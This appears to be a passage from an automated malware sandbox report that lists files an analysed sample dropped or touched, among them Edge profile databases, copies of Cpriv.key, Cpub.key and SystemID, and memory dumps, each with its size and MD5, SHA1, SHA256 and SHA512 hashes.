b49601e6745b1204f3ec838097e47bc3

SHA1
af0a823efaef5a25d5087882e854d32538b5f845

SHA256
3c29b7794592b3e3fec790e7708ba5542d56f5df757cb70d9ea3a9d177dfb642

SHA512
2a11f33ab1464d030e538249c8c73bac27e4a2d2235eed6d2108e0efc17290beae5dc9785a5f1e48e79b9cfa4f778962fc36732cee5df1f1133292933dd30f3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk

Filesize
3KB

MD5
6de04f5d7a79c391eba8abb744512e7f

SHA1
cb2d02de833931eaf18fe458598c9e70a609322a

SHA256
1672fecb2b20693cf1740e158df401e10944e895c79e8a8d0095587fcd0775da

SHA512
2d1ec0beb6be91b8ccc609f743835c2d45bd2f1c79ea2fc86d90504c420fde5e61f04214d742346152f86145e01cb24722b94b557ce68beef99c51af8a22a119

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

Filesize
794B

MD5
032b1d27a351eccf1a5656fede24dcbc

SHA1
3569de25bba1dbff42a3d552507698d12cd1e2c2

SHA256
c66933b43fece7648940be157a1434bfd9f96930b241fce4a41a2f1547bf7f0a

SHA512
d98e8a8930b3429ef737451ff67397b589da330a8562f30208de1e3b20c2994db584f27cf881434209d69d031e02d0faad0ad1319d3f727e98e1d153b454444c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Filesize
1KB

MD5
7efab0c6580cf575dae0ee651f6f339b

SHA1
ba4bd68c9c8e12f1a582d9ca85c9616dd7eee3b0

SHA256
66ddb56038fb619e933524710f8b63045fa118fa27fd4914dda709613ffd732d

SHA512
5d0285022d0c45a68481bc18ac31549ffb51e5c393a295ee1d8fd3b9c166db47fa08f971e5fb4989f581b424316734affbe4742f62203ebd57015067ba7369b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Filesize
1KB

MD5
a6700827bfe51ef6f53bc3ae5b080d9c

SHA1
eab60a2504c7efafd493c3c472b9b893d69e69b1

SHA256
7ea6ecbb16d44dc814a71579cd4133842dd7d3b3ac7dd29a2cd07cfc5ac49c62

SHA512
457a844a5ea9a0a732f210c496c9bd18bfee17f1abca3e72e583f7eee3538bc42db4d8a5d5765f94e23e43c5daf857f5b1379a040e2baaf0566b2cae82ec2030

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

Filesize
806B

MD5
32787b2f27a662d023c7578200e03be3

SHA1
39fbbdfcb8c0e03a967fcb10749ea3dbc0f8d794

SHA256
1d9dbecbbb9d037e01558f4a1d04d92725129249141f03816fe188635bf70200

SHA512
1eed40985029216f7df92c8d17a1265b7b45195cf219a5ff66c879c761019ebcd6b17e0a6444197e1a4bc6448580a728665c59682f0ad9265832e1316c04fa46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Filesize
28KB

MD5
f52b3e5685c4f2b98461bb84fe93ab55

SHA1
89d471548ded09933e4180cbffae6b54f3227173

SHA256
4ed3ecc79883e5c9a3d3aec94acd8d00cd5d88c311b5101e82639c258a2816f0

SHA512
2f1652f4e2522276f0b1c7dcb9db117ceebefd3df146222102016993ade3442da03218b35f0bd3b487327a09094d28cebb80d3afe258be2048b330c1bc1c9912

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db-journal

Filesize
706B

MD5
8b337b0f7a5d707dfa108ac1847def68

SHA1
68eebea378744b54338fcd2d22d800f9e733d7d7

SHA256
1499174abf3076d106b08f88dcf9b7932390f8b9aca3a9ad325888b6a92be303

SHA512
b454fa7f900294ca8d704f668b6949865441d4d4662c80a1f12ec801e9c1e478c5cfd8825ff6993d0f21ea647a72737dca558f9adbc3b9919d42817202deb7ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db

Filesize
16KB

MD5
9e02552124890dc7e040ce55841d75a4

SHA1
f4179e9e3c00378fa4ad61c94527602c70aa0ad9

SHA256
7b6e4ce73ddd8b5e7a7c4a94374ac2815d0048a5296879d7659a92ee0b425c77

SHA512
3e10237b1bff73f3bb031f108b8de18f1b3c3396d63dfee8eb2401ce650392b9417143a9ef5234831d8386fc12e232b583dd45eada3f2828b3a0a818123dd5cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db-journal

Filesize
706B

MD5
b0aef25946d4825cbbc33ffda77f6046

SHA1
48c62ab396377b9ff155ebe7829612827afd36fb

SHA256
076f15572ef568597c17f13255b7a20d391c880a07b17c3fbfa87143bbc3dcc4

SHA512
602aca50d733067c38dbc3c4dfd2d94d7761a87952f9438c57550e5de9d684c71ceee38b82116701dd5f4dc33ec20d4f1a3f6a3d71721cf5ceb740a88a2180fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

Filesize
4KB

MD5
cdbc34c6b228ec661b44854e59956ea7

SHA1
bf9b7608a3ac3c78ae89c8a65dd606cc29ffe1cf

SHA256
4437d1a094c0874b9491b68e0d9ece502fde77b7d22af9fa825c4526e64d593c

SHA512
8c9c511f9a381d787ccd25a6946d76c0059b29ede5dd4c66ca73a8277d618927614c4a177ec636040688c4c109ece27bbe4de8174c72770b475c223a6a5cf150

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Filesize
3.0MB

MD5
5cd74a63bb2bfd74cddd805525b66d70

SHA1
bc099646b0d25d179fafd61d55d2d73e9c37a46d

SHA256
5e1ad339c2266860a1cfc59a585f5614c649865e484399617b3503d6fde89152

SHA512
33f895aeda0bab245fdda8c4e529420299889d32b0f22c7e391b426a581bdb856b9eb415582acdbf21112875be5ce9ef45f59598cb0c31bd24d60063203ed952

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Filesize
893B

MD5
372f5c5be354d62cbf664fc943c425cc

SHA1
4f80f8089f49e12350cdd9946a83afd87992c916

SHA256
0505a20e3a309ac54446057300fcb9785fd5e354f3f1d0a0c15c45dee113f79b

SHA512
8dc3cb8cf2938e9f6cf1c9ed9cb80dbb2a8b8fbcb6b1287acb8854058eebc33be3ec0d5189da83bf9b7b1a4adff9235441b20d4149c7ba24b91a7b7baf06558c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Filesize
1KB

MD5
f40d2d7c20c23e19d0ac7c1bef181fe3

SHA1
4bebd660c3680d948cf6c384e1b3c871d1c29c31

SHA256
27cbd278619ffadab920baad3529a569b01837c588d0cb659ec09988ae0b08e3

SHA512
27b427b7da03516b75f408434832dd41b278cd934a21b52d335c244d144d054c5e06f83392a5fd8782cca8f42d3410954fccb9e76f093b87e5789f90263ac408

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1

Filesize
126KB

MD5
4ae37b50fc208bbd7ee94ec5a07261ae

SHA1
69c4671e303317c93ca70345ab5e7f1c14ebfb96

SHA256
763f37ac570757daa8e2cd346848408753ba1dc432ecd8620808db68d9d60b9e

SHA512
4f50363d0c948f1b37f5d24bf385e358b14ac69877f3e8302f322d17ffb0f81e47c8706d36e2231554616da0dbb6bd025b397d227f0f0c73d0c6a944341cbcb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cpriv.key

Filesize
2KB

MD5
f75a800de9608dc8e473e9fd38b4ef14

SHA1
03b309cf2d925d07036c64b1786cd7329d2fdc51

SHA256
69964fd6d2ae1dc5126a66751f80ed3b36e6f238556b081d5d61dadd43bc4da5

SHA512
e28d4181cc73e146f3d560b0d6d133c93f758492c3169006c175956bc3d001834cc2f63d7cde84d242ff68758d67b8e583a1135ca2cd0d320e541fb809882881

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cpub.key

Filesize
292B

MD5
ab62fc3660c1ad7a266b555357039808

SHA1
bed543a3c9999db80922e02be7008f97956d9e6c

SHA256
8cbe702f08e650d5e3fb3b5c62d56de3c42aa12c33b50c18b808bd0041b0a866

SHA512
e50124f8de0050568f3ec3ba02243e302ba61b5df9362bcbaa1dc3f284a1f1ee4b5259c6d7b7f6560bae2f94f43bbfe4d74784e06b65c1f514c36c2232e8ef28

Download Submit
C:\Users\Admin\AppData\Local\Temp\SystemID

Filesize
8B

MD5
e467f7c59507d8d87002c150ebda2721

SHA1
cffd9c48d3326e935dcd11c33670eb0be0e51287

SHA256
0d46b9a83dabb912b508ce18e8b6a137e98263dbf4ddee6bb4d141a67ede341a

SHA512
f3d7dd69a9a9406ce6a56aaa377e21eed10932d3f7a6261889d52a22e4ca16aac189af01081c82688acb7aa5780d12bad6eeb28a98e53b059603bb5453839f03

Download Submit
C:\Users\Admin\AppData\Roaming\Cpriv.key

Filesize
2KB

MD5
f75a800de9608dc8e473e9fd38b4ef14

SHA1
03b309cf2d925d07036c64b1786cd7329d2fdc51

SHA256
69964fd6d2ae1dc5126a66751f80ed3b36e6f238556b081d5d61dadd43bc4da5

SHA512
e28d4181cc73e146f3d560b0d6d133c93f758492c3169006c175956bc3d001834cc2f63d7cde84d242ff68758d67b8e583a1135ca2cd0d320e541fb809882881

Download Submit
C:\Users\Admin\AppData\Roaming\Cpub.key

Filesize
292B

MD5
ab62fc3660c1ad7a266b555357039808

SHA1
bed543a3c9999db80922e02be7008f97956d9e6c

SHA256
8cbe702f08e650d5e3fb3b5c62d56de3c42aa12c33b50c18b808bd0041b0a866

SHA512
e50124f8de0050568f3ec3ba02243e302ba61b5df9362bcbaa1dc3f284a1f1ee4b5259c6d7b7f6560bae2f94f43bbfe4d74784e06b65c1f514c36c2232e8ef28

Download Submit
C:\Users\Admin\AppData\Roaming\Cpub.key

Filesize
292B

MD5
ab62fc3660c1ad7a266b555357039808

SHA1
bed543a3c9999db80922e02be7008f97956d9e6c

SHA256
8cbe702f08e650d5e3fb3b5c62d56de3c42aa12c33b50c18b808bd0041b0a866

SHA512
e50124f8de0050568f3ec3ba02243e302ba61b5df9362bcbaa1dc3f284a1f1ee4b5259c6d7b7f6560bae2f94f43bbfe4d74784e06b65c1f514c36c2232e8ef28

Download Submit
C:\Users\Admin\AppData\Roaming\SystemID

Filesize
8B

MD5
e467f7c59507d8d87002c150ebda2721

SHA1
cffd9c48d3326e935dcd11c33670eb0be0e51287

SHA256
0d46b9a83dabb912b508ce18e8b6a137e98263dbf4ddee6bb4d141a67ede341a

SHA512
f3d7dd69a9a9406ce6a56aaa377e21eed10932d3f7a6261889d52a22e4ca16aac189af01081c82688acb7aa5780d12bad6eeb28a98e53b059603bb5453839f03

Download Submit
memory/4356-170-0x0000000000890000-0x00000000012B8000-memory.dmp

Filesize
10.2MB

Download
memory/4356-169-0x0000000000890000-0x00000000012B8000-memory.dmp

Filesize
10.2MB

Download
memory/4356-133-0x0000000000890000-0x00000000012B8000-memory.dmp

Filesize
10.2MB

Download
memory/4356-132-0x0000000000890000-0x00000000012B8000-memory.dmp

Filesize
10.2MB

Download